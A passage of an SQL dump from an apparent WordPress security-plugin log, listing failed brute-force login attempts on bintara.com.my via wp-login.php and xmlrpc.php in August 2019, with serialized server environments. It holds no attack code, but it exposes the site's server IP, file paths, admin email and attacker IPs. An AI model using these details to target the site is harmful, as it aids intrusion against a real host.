Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.63.219\";s:11:\"REMOTE_PORT\";s:5:\"60050\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSq@A0@TGWC-1tzGX50MQAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566878456.8975\";s:12:\"REQUEST_TIME\";s:10:\"1566878456\";}}','notice','2019-08-27 04:00:58','2019-08-27 04:00:57',17683640,19174640,'https://bintara.com.my/wp-login.php',1,0,'46.101.63.219'),(23360,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.63.219\";s:11:\"REMOTE_PORT\";s:5:\"60242\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSq-LdCvC5@KvzqwiEtwgAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1566878460.27\";s:12:\"REQUEST_TIME\";s:10:\"1566878460\";}}','notice','2019-08-27 04:01:01','2019-08-27 04:01:00',18202560,19501288,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.63.219'),(23361,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.22.92.226\";s:11:\"REMOTE_PORT\";s:5:\"45160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWStDYir4pgxiIHnHK41XQAAAcM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566878989.1923\";s:12:\"REQUEST_TIME\";s:10:\"1566878989\";}}','notice','2019-08-27 04:09:51','2019-08-27 04:09:49',17684768,19175856,'https://bintara.com.my/wp-login.php',1,0,'185.22.92.226'),(23362,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.22.92.226\";s:11:\"REMOTE_PORT\";s:5:\"46072\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWStELdCvC5@KvzqwiEvbgAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566878992.997\";s:12:\"REQUEST_TIME\";s:10:\"1566878992\";}}','notice','2019-08-27 04:09:54','2019-08-27 04:09:53',18203040,19501864,'https://bintara.com.my/xmlrpc.php',1,0,'185.22.92.226'),(23363,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.225.139.136\";s:11:\"REMOTE_PORT\";s:5:\"48590\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWSyxLdCvC5@KvzqwiEzzwAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566880452.7384\";s:12:\"REQUEST_TIME\";s:10:\"1566880452\";}}','notice','2019-08-27 04:34:14','2019-08-27 04:34:13',17681840,19172040,'https://bintara.com.my/wp-login.php',1,0,'35.225.139.136'),(23364,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"122.116.216.17\";s:11:\"REMOTE_PORT\";s:5:\"43202\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS0erdCvC5@KvzqwiE07QAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566880890.9891\";s:12:\"REQUEST_TIME\";s:10:\"1566880890\";}}','notice','2019-08-27 04:41:32','2019-08-27 04:41:31',17682640,19173392,'https://bintara.com.my/wp-login.php',1,0,'122.116.216.17'),(23365,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"45.76.152.220\";s:11:\"REMOTE_PORT\";s:5:\"39114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS4OrdCvC5@KvzqwiE3UQAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566881850.4238\";s:12:\"REQUEST_TIME\";s:10:\"1566881850\";}}','notice','2019-08-27 04:57:31','2019-08-27 04:57:30',17681760,19172784,'https://bintara.com.my/wp-login.php',1,0,'45.76.152.220'),(23366,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"37.59.9.195\";s:11:\"REMOTE_PORT\";s:5:\"40946\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS6JQ0@TGWC-1tzGX54SwAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566882341.2429\";s:12:\"REQUEST_TIME\";s:10:\"1566882341\";}}','notice','2019-08-27 05:05:42','2019-08-27 05:05:41',17685632,19176256,'https://bintara.com.my/wp-login.php',1,0,'37.59.9.195'),(23367,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"203.151.83.160\";s:11:\"REMOTE_PORT\";s:5:\"37378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS8EGXkG1atThADMYGgrgAAANE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566882832.938\";s:12:\"REQUEST_TIME\";s:10:\"1566882832\";}}','notice','2019-08-27 05:13:54','2019-08-27 05:13:53',17685920,19176632,'https://bintara.com.my/wp-login.php',1,0,'203.151.83.160'),(23368,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 